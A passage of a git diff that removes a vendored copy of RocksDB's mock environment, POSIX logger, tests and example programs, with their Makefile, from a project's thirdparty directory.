-        return Status::InvalidArgument(fn, "Not a lock file.");
-      }
-      file_map_[fn]->Unlock();
-    }
-  }
-  delete flock;
-  return Status::OK();
-}
-
-Status MockEnv::GetTestDirectory(std::string* path) {
-  *path = "/test";
-  return Status::OK();
-}
-
-Status MockEnv::GetCurrentTime(int64_t* unix_time) {
-  auto s = EnvWrapper::GetCurrentTime(unix_time);
-  if (s.ok()) {
-    *unix_time += fake_sleep_micros_.load() / (1000 * 1000);
-  }
-  return s;
-}
-
-uint64_t MockEnv::NowMicros() {
-  return EnvWrapper::NowMicros() + fake_sleep_micros_.load();
-}
-
-uint64_t MockEnv::NowNanos() {
-  return EnvWrapper::NowNanos() + fake_sleep_micros_.load() * 1000;
-}
-
-// Non-virtual functions, specific to MockEnv
-Status MockEnv::Truncate(const std::string& fname, size_t size) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-  iter->second->Truncate(size);
-  return Status::OK();
-}
-
-Status MockEnv::CorruptBuffer(const std::string& fname) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-  iter->second->CorruptBuffer();
-  return Status::OK();
-}
-
-std::string MockEnv::NormalizePath(const std::string path) {
-  std::string dst;
-  for (auto c : path) {
-    if (!dst.empty() && c == '/' && dst.back() == '/') {
-      continue;
-    }
-    dst.push_back(c);
-  }
-  return dst;
-}
-
-void MockEnv::FakeSleepForMicroseconds(int64_t micros) {
-  fake_sleep_micros_.fetch_add(micros);
-}
-
-#ifndef ROCKSDB_LITE
-// This is to maintain the behavior before swithcing from InMemoryEnv to MockEnv
-Env* NewMemEnv(Env* base_env) { return new MockEnv(base_env); }
-
-#else  // ROCKSDB_LITE
-
-Env* NewMemEnv(Env* base_env) { return nullptr; }
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/mock_env.h b/thirdparty/rocksdb/env/mock_env.h
deleted file mode 100644
index ba1e5fa..0000000
--- a/thirdparty/rocksdb/env/mock_env.h
+++ /dev/null
@@ -1,115 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <map>
-#include <string>
-#include <vector>
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "port/port.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-class MemFile;
-class MockEnv : public EnvWrapper {
- public:
-  explicit MockEnv(Env* base_env);
-
-  virtual ~MockEnv();
-
-  // Partial implementation of the Env interface.
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& soptions) override;
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& soptions) override;
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override;
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override;
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& env_options) override;
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override;
-
-  virtual Status FileExists(const std::string& fname) override;
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override;
-
-  void DeleteFileInternal(const std::string& fname);
-
-  virtual Status DeleteFile(const std::string& fname) override;
-
-  virtual Status CreateDir(const std::string& dirname) override;
-
-  virtual Status CreateDirIfMissing(const std::string& dirname) override;
-
-  virtual Status DeleteDir(const std::string& dirname) override;
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* file_size) override;
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* time) override;
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) override;
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& target) override;
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override;
-
-  virtual Status LockFile(const std::string& fname, FileLock** flock) override;
-
-  virtual Status UnlockFile(FileLock* flock) override;
-
-  virtual Status GetTestDirectory(std::string* path) override;
-
-  // Results of these can be affected by FakeSleepForMicroseconds()
-  virtual Status GetCurrentTime(int64_t* unix_time) override;
-  virtual uint64_t NowMicros() override;
-  virtual uint64_t NowNanos() override;
-
-  // Non-virtual functions, specific to MockEnv
-  Status Truncate(const std::string& fname, size_t size);
-
-  Status CorruptBuffer(const std::string& fname);
-
-  // Doesn't really sleep, just affects output of GetCurrentTime(), NowMicros()
-  // and NowNanos()
-  void FakeSleepForMicroseconds(int64_t micros);
-
- private:
-  std::string NormalizePath(const std::string path);
-
-  // Map from filenames to MemFile objects, representing a simple file system.
-  typedef std::map<std::string, MemFile*> FileSystem;
-  port::Mutex mutex_;
-  FileSystem file_map_;  // Protected by mutex_.
-
-  std::atomic<int64_t> fake_sleep_micros_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/mock_env_test.cc b/thirdparty/rocksdb/env/mock_env_test.cc
deleted file mode 100644
index 19e259c..0000000
--- a/thirdparty/rocksdb/env/mock_env_test.cc
+++ /dev/null
@@ -1,85 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "env/mock_env.h"
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class MockEnvTest : public testing::Test {
- public:
-  MockEnv* env_;
-  const EnvOptions soptions_;
-
-  MockEnvTest()
-      : env_(new MockEnv(Env::Default())) {
-  }
-  ~MockEnvTest() {
-    delete env_;
-  }
-};
-
-TEST_F(MockEnvTest, Corrupt) {
-  const std::string kGood = "this is a good string, synced to disk";
-  const std::string kCorrupted = "this part may be corrupted";
-  const std::string kFileName = "/dir/f";
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile(kFileName, &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append(kGood));
-  ASSERT_TRUE(writable_file->GetFileSize() == kGood.size());
-
-  std::string scratch;
-  scratch.resize(kGood.size() + kCorrupted.size() + 16);
-  Slice result;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_OK(env_->NewRandomAccessFile(kFileName, &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(0, kGood.size(), &result, &(scratch[0])));
-  ASSERT_EQ(result.compare(kGood), 0);
-
-  // Sync + corrupt => no change
-  ASSERT_OK(writable_file->Fsync());
-  ASSERT_OK(dynamic_cast<MockEnv*>(env_)->CorruptBuffer(kFileName));
-  result.clear();
-  ASSERT_OK(rand_file->Read(0, kGood.size(), &result, &(scratch[0])));
-  ASSERT_EQ(result.compare(kGood), 0);
-
-  // Add new data and corrupt it
-  ASSERT_OK(writable_file->Append(kCorrupted));
-  ASSERT_TRUE(writable_file->GetFileSize() == kGood.size() + kCorrupted.size());
-  result.clear();
-  ASSERT_OK(rand_file->Read(kGood.size(), kCorrupted.size(),
-            &result, &(scratch[0])));
-  ASSERT_EQ(result.compare(kCorrupted), 0);
-  // Corrupted
-  ASSERT_OK(dynamic_cast<MockEnv*>(env_)->CorruptBuffer(kFileName));
-  result.clear();
-  ASSERT_OK(rand_file->Read(kGood.size(), kCorrupted.size(),
-            &result, &(scratch[0])));
-  ASSERT_NE(result.compare(kCorrupted), 0);
-}
-
-TEST_F(MockEnvTest, FakeSleeping) {
-  int64_t now = 0;
-  auto s = env_->GetCurrentTime(&now);
-  ASSERT_OK(s);
-  env_->FakeSleepForMicroseconds(3 * 1000 * 1000);
-  int64_t after_sleep = 0;
-  s = env_->GetCurrentTime(&after_sleep);
-  ASSERT_OK(s);
-  auto delta = after_sleep - now;
-  // this will be true unless test runs for 2 seconds
-  ASSERT_TRUE(delta == 3 || delta == 4);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/env/posix_logger.h b/thirdparty/rocksdb/env/posix_logger.h
deleted file mode 100644
index 3ec6f57..0000000
--- a/thirdparty/rocksdb/env/posix_logger.h
+++ /dev/null
@@ -1,169 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#pragma once
-#include <algorithm>
-#include <stdio.h>
-#include "port/sys_time.h"
-#include <time.h>
-#include <fcntl.h>
-
-#ifdef OS_LINUX
-#ifndef FALLOC_FL_KEEP_SIZE
-#include <linux/falloc.h>
-#endif
-#endif
-
-#include <atomic>
-#include "monitoring/iostats_context_imp.h"
-#include "rocksdb/env.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class PosixLogger : public Logger {
- private:
-  FILE* file_;
-  uint64_t (*gettid_)();  // Return the thread id for the current thread
-  std::atomic_size_t log_size_;
-  int fd_;
-  const static uint64_t flush_every_seconds_ = 5;
-  std::atomic_uint_fast64_t last_flush_micros_;
-  Env* env_;
-  std::atomic<bool> flush_pending_;
- public:
-  PosixLogger(FILE* f, uint64_t (*gettid)(), Env* env,
-              const InfoLogLevel log_level = InfoLogLevel::ERROR_LEVEL)
-      : Logger(log_level),
-        file_(f),
-        gettid_(gettid),
-        log_size_(0),
-        fd_(fileno(f)),
-        last_flush_micros_(0),
-        env_(env),
-        flush_pending_(false) {}
-  virtual ~PosixLogger() {
-    fclose(file_);
-  }
-  virtual void Flush() override {
-    TEST_SYNC_POINT("PosixLogger::Flush:Begin1");
-    TEST_SYNC_POINT("PosixLogger::Flush:Begin2");
-    if (flush_pending_) {
-      flush_pending_ = false;
-      fflush(file_);
-    }
-    last_flush_micros_ = env_->NowMicros();
-  }
-
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    IOSTATS_TIMER_GUARD(logger_nanos);
-
-    const uint64_t thread_id = (*gettid_)();
-
-    // We try twice: the first time with a fixed-size stack allocated buffer,
-    // and the second time with a much larger dynamically allocated buffer.
-    char buffer[500];
-    for (int iter = 0; iter < 2; iter++) {
-      char* base;
-      int bufsize;
-      if (iter == 0) {
-        bufsize = sizeof(buffer);
-        base = buffer;
-      } else {
-        bufsize = 65536;
-        base = new char[bufsize];
-      }
-      char* p = base;
-      char* limit = base + bufsize;
-
-      struct timeval now_tv;
-      gettimeofday(&now_tv, nullptr);
-      const time_t seconds = now_tv.tv_sec;
-      struct tm t;
-      localtime_r(&seconds, &t);
-      p += snprintf(p, limit - p,
-                    "%04d/%02d/%02d-%02d:%02d:%02d.%06d %llx ",
-                    t.tm_year + 1900,
-                    t.tm_mon + 1,
-                    t.tm_mday,
-                    t.tm_hour,
-                    t.tm_min,
-                    t.tm_sec,
-                    static_cast<int>(now_tv.tv_usec),
-                    static_cast<long long unsigned int>(thread_id));
-
-      // Print the message
-      if (p < limit) {
-        va_list backup_ap;
-        va_copy(backup_ap, ap);
-        p += vsnprintf(p, limit - p, format, backup_ap);
-        va_end(backup_ap);
-      }
-
-      // Truncate to available space if necessary
-      if (p >= limit) {
-        if (iter == 0) {
-          continue;       // Try again with larger buffer
-        } else {
-          p = limit - 1;
-        }
-      }
-
-      // Add newline if necessary
-      if (p == base || p[-1] != '\n') {
-        *p++ = '\n';
-      }
-
-      assert(p <= limit);
-      const size_t write_size = p - base;
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-      const int kDebugLogChunkSize = 128 * 1024;
-
-      // If this write would cross a boundary of kDebugLogChunkSize
-      // space, pre-allocate more space to avoid overly large
-      // allocations from filesystem allocsize options.
-      const size_t log_size = log_size_;
-      const size_t last_allocation_chunk =
-        ((kDebugLogChunkSize - 1 + log_size) / kDebugLogChunkSize);
-      const size_t desired_allocation_chunk =
-        ((kDebugLogChunkSize - 1 + log_size + write_size) /
-           kDebugLogChunkSize);
-      if (last_allocation_chunk != desired_allocation_chunk) {
-        fallocate(
-            fd_, FALLOC_FL_KEEP_SIZE, 0,
-            static_cast<off_t>(desired_allocation_chunk * kDebugLogChunkSize));
-      }
-#endif
-
-      size_t sz = fwrite(base, 1, write_size, file_);
-      flush_pending_ = true;
-      assert(sz == write_size);
-      if (sz > 0) {
-        log_size_ += write_size;
-      }
-      uint64_t now_micros = static_cast<uint64_t>(now_tv.tv_sec) * 1000000 +
-        now_tv.tv_usec;
-      if (now_micros - last_flush_micros_ >= flush_every_seconds_ * 1000000) {
-        Flush();
-      }
-      if (base != buffer) {
-        delete[] base;
-      }
-      break;
-    }
-  }
-  size_t GetLogFileSize() const override { return log_size_; }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/examples/.gitignore b/thirdparty/rocksdb/examples/.gitignore
deleted file mode 100644
index b5a05e4..0000000
--- a/thirdparty/rocksdb/examples/.gitignore
+++ /dev/null
@@ -1,8 +0,0 @@
-c_simple_example
-column_families_example
-compact_files_example
-compaction_filter_example
-optimistic_transaction_example
-options_file_example
-simple_example
-transaction_example
diff --git a/thirdparty/rocksdb/examples/Makefile b/thirdparty/rocksdb/examples/Makefile
deleted file mode 100644
index 57cd1a7..0000000
--- a/thirdparty/rocksdb/examples/Makefile
+++ /dev/null
@@ -1,50 +0,0 @@
-include ../make_config.mk
-
-ifndef DISABLE_JEMALLOC
-	ifdef JEMALLOC
-		PLATFORM_CXXFLAGS += -DROCKSDB_JEMALLOC -DJEMALLOC_NO_DEMANGLE
-	endif
-	EXEC_LDFLAGS := $(JEMALLOC_LIB) $(EXEC_LDFLAGS) -lpthread
-	PLATFORM_CXXFLAGS += $(JEMALLOC_INCLUDE)
-endif
-
-ifneq ($(USE_RTTI), 1)
-	CXXFLAGS += -fno-rtti
-endif
-
-.PHONY: clean librocksdb
-
-all: simple_example column_families_example compact_files_example c_simple_example optimistic_transaction_example transaction_example compaction_filter_example options_file_example
-
-simple_example: librocksdb simple_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-column_families_example: librocksdb column_families_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-compaction_filter_example: librocksdb compaction_filter_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-compact_files_example: librocksdb compact_files_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-.c.o:
-	$(CC) $(CFLAGS) -c $< -o $@ -I../include
-
-c_simple_example: librocksdb c_simple_example.o
-	$(CXX) $@.o -o$@ ../librocksdb.a $(PLATFORM_LDFLAGS) $(EXEC_LDFLAGS)
-
-optimistic_transaction_example: librocksdb optimistic_transaction_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-transaction_example: librocksdb transaction_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-options_file_example: librocksdb options_file_example.cc
-	$(CXX) $(CXXFLAGS) $@.cc -o$@ ../librocksdb.a -I../include -O2 -std=c++11 $(PLATFORM_LDFLAGS) $(PLATFORM_CXXFLAGS) $(EXEC_LDFLAGS)
-
-clean:
-	rm -rf ./simple_example ./column_families_example ./compact_files_example ./compaction_filter_example ./c_simple_example c_simple_example.o ./optimistic_transaction_example ./transaction_example ./options_file_example
-
-librocksdb:
-	cd .. && $(MAKE) static_lib
diff --git a/thirdparty/rocksdb/examples/README.md b/thirdparty/rocksdb/examples/README.md
deleted file mode 100644
index f4ba238..0000000
--- a/thirdparty/rocksdb/examples/README.md
+++ /dev/null
@@ -1,2 +0,0 @@
-1. Compile RocksDB first by executing `make static_lib` in parent dir
-2. Compile all examples: `cd examples/; make all`
diff --git a/thirdparty/rocksdb/examples/c_simple_example.c b/thirdparty/rocksdb/examples/c_simple_example.c
deleted file mode 100644
index 5564361..0000000
--- a/thirdparty/rocksdb/examples/c_simple_example.c
+++ /dev/null
@@ -1,79 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <assert.h>
-
-#include "rocksdb/c.h"
-
-#include <unistd.h>  // sysconf() - get CPU count
-
-const char DBPath[] = "/tmp/rocksdb_simple_example";
-const char DBBackupPath[] = "/tmp/rocksdb_simple_example_backup";
-
-int main(int argc, char **argv) {
-  rocksdb_t *db;
-  rocksdb_backup_engine_t *be;
-  rocksdb_options_t *options = rocksdb_options_create();
-  // Optimize RocksDB. This is the easiest way to
-  // get RocksDB to perform well
-  long cpus = sysconf(_SC_NPROCESSORS_ONLN);  // get # of online cores
-  rocksdb_options_increase_parallelism(options, (int)(cpus));
-  rocksdb_options_optimize_level_style_compaction(options, 0);
-  // create the DB if it's not already present
-  rocksdb_options_set_create_if_missing(options, 1);
-
-  // open DB
-  char *err = NULL;
-  db = rocksdb_open(options, DBPath, &err);
-  assert(!err);
-
-  // open Backup Engine that we will use for backing up our database
-  be = rocksdb_backup_engine_open(options, DBBackupPath, &err);
-  assert(!err);
-
-  // Put key-value
-  rocksdb_writeoptions_t *writeoptions = rocksdb_writeoptions_create();
-  const char key[] = "key";
-  const char *value = "value";
-  rocksdb_put(db, writeoptions, key, strlen(key), value, strlen(value) + 1,
-              &err);
-  assert(!err);
-  // Get value
-  rocksdb_readoptions_t *readoptions = rocksdb_readoptions_create();
-  size_t len;
-  char *returned_value =
-      rocksdb_get(db, readoptions, key, strlen(key), &len, &err);
-  assert(!err);
-  assert(strcmp(returned_value, "value") == 0);
-  free(returned_value);
-
-  // create new backup in a directory specified by DBBackupPath
-  rocksdb_backup_engine_create_new_backup(be, db, &err);
-  assert(!err);
-
-  rocksdb_close(db);
-
-  // If something is wrong, you might want to restore data from last backup
-  rocksdb_restore_options_t *restore_options = rocksdb_restore_options_create();
-  rocksdb_backup_engine_restore_db_from_latest_backup(be, DBPath, DBPath,
-                                                      restore_options, &err);
-  assert(!err);
-  rocksdb_restore_options_destroy(restore_options);
-
-  db = rocksdb_open(options, DBPath, &err);
-  assert(!err);
-
-  // cleanup
-  rocksdb_writeoptions_destroy(writeoptions);
-  rocksdb_readoptions_destroy(readoptions);
-  rocksdb_options_destroy(options);
-  rocksdb_backup_engine_close(be);
-  rocksdb_close(db);
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/column_families_example.cc b/thirdparty/rocksdb/examples/column_families_example.cc
deleted file mode 100644
index 589ff8e..0000000
--- a/thirdparty/rocksdb/examples/column_families_example.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include <cstdio>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_column_families_example";
-
-int main() {
-  // open DB
-  Options options;
-  options.create_if_missing = true;
-  DB* db;
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // create column family
-  ColumnFamilyHandle* cf;
-  s = db->CreateColumnFamily(ColumnFamilyOptions(), "new_cf", &cf);
-  assert(s.ok());
-
-  // close DB
-  delete cf;
-  delete db;
-
-  // open DB with two column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new one, too
-  column_families.push_back(ColumnFamilyDescriptor(
-      "new_cf", ColumnFamilyOptions()));
-  std::vector<ColumnFamilyHandle*> handles;
-  s = DB::Open(DBOptions(), kDBPath, column_families, &handles, &db);
-  assert(s.ok());
-
-  // put and get from non-default column family
-  s = db->Put(WriteOptions(), handles[1], Slice("key"), Slice("value"));
-  assert(s.ok());
-  std::string value;
-  s = db->Get(ReadOptions(), handles[1], Slice("key"), &value);
-  assert(s.ok());
-
-  // atomic write
-  WriteBatch batch;
-  batch.Put(handles[0], Slice("key2"), Slice("value2"));
-  batch.Put(handles[1], Slice("key3"), Slice("value3"));
-  batch.Delete(handles[0], Slice("key"));
-  s = db->Write(WriteOptions(), &batch);
-  assert(s.ok());
-
-  // drop column family
-  s = db->DropColumnFamily(handles[1]);
-  assert(s.ok());
-
-  // close db
-  for (auto handle : handles) {
-    delete handle;
-  }
-  delete db;
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/compact_files_example.cc b/thirdparty/rocksdb/examples/compact_files_example.cc
deleted file mode 100644
index c27df8e..0000000
--- a/thirdparty/rocksdb/examples/compact_files_example.cc
+++ /dev/null
@@ -1,171 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// An example code demonstrating how to use CompactFiles, EventListener,
-// and GetColumnFamilyMetaData APIs to implement custom compaction algorithm.
-
-#include <mutex>
-#include <string>
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-
-using namespace rocksdb;
-std::string kDBPath = "/tmp/rocksdb_compact_files_example";
-struct CompactionTask;
-
-// This is an example interface of external-compaction algorithm.
-// Compaction algorithm can be implemented outside the core-RocksDB
-// code by using the pluggable compaction APIs that RocksDb provides.
-class Compactor : public EventListener {
- public:
-  // Picks and returns a compaction task given the specified DB
-  // and column family.  It is the caller's responsibility to
-  // destroy the returned CompactionTask.  Returns "nullptr"
-  // if it cannot find a proper compaction task.
-  virtual CompactionTask* PickCompaction(
-      DB* db, const std::string& cf_name) = 0;
-
-  // Schedule and run the specified compaction task in background.
-  virtual void ScheduleCompaction(CompactionTask *task) = 0;
-};
-
-// Example structure that describes a compaction task.
-struct CompactionTask {
-  CompactionTask(
-      DB* _db, Compactor* _compactor,
-      const std::string& _column_family_name,
-      const std::vector<std::string>& _input_file_names,
-      const int _output_level,
-      const CompactionOptions& _compact_options,
-      bool _retry_on_fail)
-          : db(_db),
-            compactor(_compactor),
-            column_family_name(_column_family_name),
-            input_file_names(_input_file_names),
-            output_level(_output_level),
-            compact_options(_compact_options),
-            retry_on_fail(_retry_on_fail) {}
-  DB* db;
-  Compactor* compactor;
-  const std::string& column_family_name;
-  std::vector<std::string> input_file_names;
-  int output_level;
-  CompactionOptions compact_options;
-  bool retry_on_fail;
-};
-
-// A simple compaction algorithm that always compacts everything
-// to the highest level whenever possible.
-class FullCompactor : public Compactor {
- public:
-  explicit FullCompactor(const Options options) : options_(options) {
-    compact_options_.compression = options_.compression;
-    compact_options_.output_file_size_limit =
-        options_.target_file_size_base;
-  }
-
-  // When flush happens, it determines whether to trigger compaction. If
-  // triggered_writes_stop is true, it will also set the retry flag of
-  // compaction-task to true.
-  void OnFlushCompleted(
-      DB* db, const FlushJobInfo& info) override {
-    CompactionTask* task = PickCompaction(db, info.cf_name);
-    if (task != nullptr) {
-      if (info.triggered_writes_stop) {
-        task->retry_on_fail = true;
-      }
-      // Schedule compaction in a different thread.
-      ScheduleCompaction(task);
-    }
-  }
-
-  // Always pick a compaction which includes all files whenever possible.
-  CompactionTask* PickCompaction(
-      DB* db, const std::string& cf_name) override {
-    ColumnFamilyMetaData cf_meta;
-    db->GetColumnFamilyMetaData(&cf_meta);
-
-    std::vector<std::string> input_file_names;
-    for (auto level : cf_meta.levels) {
-      for (auto file : level.files) {
-        if (file.being_compacted) {
-          return nullptr;
-        }
-        input_file_names.push_back(file.name);
-      }
-    }
-    return new CompactionTask(
-        db, this, cf_name, input_file_names,
-        options_.num_levels - 1, compact_options_, false);
-  }
-
-  // Schedule the specified compaction task in background.
-  void ScheduleCompaction(CompactionTask* task) override {
-    options_.env->Schedule(&FullCompactor::CompactFiles, task);
-  }
-
-  static void CompactFiles(void* arg) {
-    std::unique_ptr<CompactionTask> task(
-        reinterpret_cast<CompactionTask*>(arg));
-    assert(task);
-    assert(task->db);
-    Status s = task->db->CompactFiles(
-        task->compact_options,
-        task->input_file_names,
-        task->output_level);
-    printf("CompactFiles() finished with status %s\n", s.ToString().c_str());
-    if (!s.ok() && !s.IsIOError() && task->retry_on_fail) {
-      // If a compaction task with its retry_on_fail=true failed,
-      // try to schedule another compaction in case the reason
-      // is not an IO error.
-      CompactionTask* new_task = task->compactor->PickCompaction(
-          task->db, task->column_family_name);
-      task->compactor->ScheduleCompaction(new_task);
-    }
-  }
-
- private:
-  Options options_;
-  CompactionOptions compact_options_;
-};
-
-int main() {
-  Options options;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  // Small slowdown and stop trigger for experimental purpose.
-  options.level0_slowdown_writes_trigger = 3;
-  options.level0_stop_writes_trigger = 5;
-  options.IncreaseParallelism(5);
-  options.listeners.emplace_back(new FullCompactor(options));
-
-  DB* db = nullptr;
-  DestroyDB(kDBPath, options);
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-  assert(db);
-
-  // if background compaction is not working, write will stall
-  // because of options.level0_stop_writes_trigger
-  for (int i = 1000; i < 99999; ++i) {
-    db->Put(WriteOptions(), std::to_string(i),
-                            std::string(500, 'a' + (i % 26)));
-  }
-
-  // verify the values are still there
-  std::string value;
-  for (int i = 1000; i < 99999; ++i) {
-    db->Get(ReadOptions(), std::to_string(i),
-                           &value);
-    assert(value == std::string(500, 'a' + (i % 26)));
-  }
-
-  // close the db.
-  delete db;
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/compaction_filter_example.cc b/thirdparty/rocksdb/examples/compaction_filter_example.cc
deleted file mode 100644
index 226dfe7..0000000
--- a/thirdparty/rocksdb/examples/compaction_filter_example.cc
+++ /dev/null
@@ -1,87 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <rocksdb/compaction_filter.h>
-#include <rocksdb/db.h>
-#include <rocksdb/merge_operator.h>
-#include <rocksdb/options.h>
-
-class MyMerge : public rocksdb::MergeOperator {
- public:
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    merge_out->new_value.clear();
-    if (merge_in.existing_value != nullptr) {
-      merge_out->new_value.assign(merge_in.existing_value->data(),
-                                  merge_in.existing_value->size());
-    }
-    for (const rocksdb::Slice& m : merge_in.operand_list) {
-      fprintf(stderr, "Merge(%s)\n", m.ToString().c_str());
-      // the compaction filter filters out bad values
-      assert(m.ToString() != "bad");
-      merge_out->new_value.assign(m.data(), m.size());
-    }
-    return true;
-  }
-
-  const char* Name() const override { return "MyMerge"; }
-};
-
-class MyFilter : public rocksdb::CompactionFilter {
- public:
-  bool Filter(int level, const rocksdb::Slice& key,
-              const rocksdb::Slice& existing_value, std::string* new_value,
-              bool* value_changed) const override {
-    fprintf(stderr, "Filter(%s)\n", key.ToString().c_str());
-    ++count_;
-    assert(*value_changed == false);
-    return false;
-  }
-
-  bool FilterMergeOperand(int level, const rocksdb::Slice& key,
-                          const rocksdb::Slice& existing_value) const override {
-    fprintf(stderr, "FilterMerge(%s)\n", key.ToString().c_str());
-    ++merge_count_;
-    return existing_value == "bad";
-  }
-
-  const char* Name() const override { return "MyFilter"; }
-
-  mutable int count_ = 0;
-  mutable int merge_count_ = 0;
-};
-
-int main() {
-  rocksdb::DB* raw_db;
-  rocksdb::Status status;
-
-  MyFilter filter;
-
-  int ret = system("rm -rf /tmp/rocksmergetest");
-  if (ret != 0) {
